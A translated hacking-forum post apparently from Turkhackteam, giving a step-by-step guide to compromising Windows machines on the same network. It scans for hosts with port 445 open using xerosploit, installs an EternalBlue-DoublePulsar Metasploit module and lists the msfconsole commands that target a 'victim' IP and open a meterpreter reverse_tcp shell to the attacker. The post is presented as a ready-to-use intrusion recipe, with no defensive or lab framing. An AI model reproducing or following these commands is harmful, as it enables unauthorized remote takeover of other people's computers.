How to Hack Any Pc in the Same Network

Gauloran

Moderasyon Ekibi Lideri
7 Tem 2013
8,192
653
How to Hack Any Pc in the Same Network

Today I'll show you how to hack any pc in same network without sending anything. Let's get start..

First of all, you can't hack any pc in the same network if you can't find any open port so this method doesn't work on Windows 10, 8 and 8.1. It works on these systems:

Kod:
Windows XP (all services pack) (x86) (x64)
Windows Server 2003 SP0 (x86)
Windows Server 2003 SP1/SP2 (x86)
Windows Server 2003 (x64)
Windows Vista (x86)
Windows Vista (x64)
Windows Server 2008 (x86)
Windows Server 2008 R2 (x86) (x64)
Windows 7 (all services pack) (x86) (x64)

Download link: https://github.com/LionSec/xerosploit

1) To scan computers on the network:

First install "xerosploit" on your virtual machine. You can find in github. Open and type "sudo xerosploit" on the terminal after the installing.

2) Scanning process:

Just type "scan"

EyE5q8.png


3)Port Scan:

Type the ipv4 address of the target pc after the scan. Scan all ipv4 addresses one by one until port 455.

5GRMkj.png


4)Open Port Scan:

1-type "pscan"
2-type "run"

After that this line should appear: MICROSOFT-DS | 445/TCP | OPEN |

If you see the line you can exit xerosploit but if you don't see it you need to try different pc or firewall.

a1B22z.png


MalLpg.png


69oJy9.png


--------- Eternalblue-Doublepulsar-Me.tasploit Step [Installation] -----------

1-) Eternalblue-Doublepulsar-Met.asploit [Installation]

Open Terminal and type the following commands:
-git clone https://github.com/ElevenPaths/Etern...sar-****sploit
-cd Eternalblue-Doublepulsar-Met.asploit
-mv eternalblue_doublepulsar.rb /usr/share/****sploit-framework/modules/exploits/windows/smb

Type "msfconsole" after these commands.

69oJy9.png


----------- MsfConsole [Penetration Process] -------------


Type the following commands on the Msf:
-use exploit / windows / smb / eternalblue_doublepulsar
-set rhost "victim's ipv4 address (ipv4 we target at xerosplit)"
-set PROCESSINJECT svchost.exe
-set payload windows / meterpreter / reverse_tcp
-set lhost "your linux pc ipv4 address"
-exploit
and wait until the "meterpreter" arrives, type "exploit" if it doesn't.

AyY5JL.png


8NEDMn.png


Dyk4Po.png


mJ8138.png


[ame]https://www.youtube.com/watch?v=cAP0H18juXk&feature=emb_logo[/ame]

69oJy9.png


[-Errors And Solutions-]

ERROR CODE: "Ooops Something Went Error!"

Solution: Open the terminal and type this command:

dpkg --add-architecture i386 && apt-get update && apt-get install wine32

and also you can check this video:

[ame]https://www.youtube.com/watch?v=FGmWxajkZAc&feature=emb_logo[/ame]

Thanks!!

Source: https://www.turkhackteam.org/exploi...hedefe-hicbir-sey-gondermenize-gerek-yok.html
Translator @dRose98
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.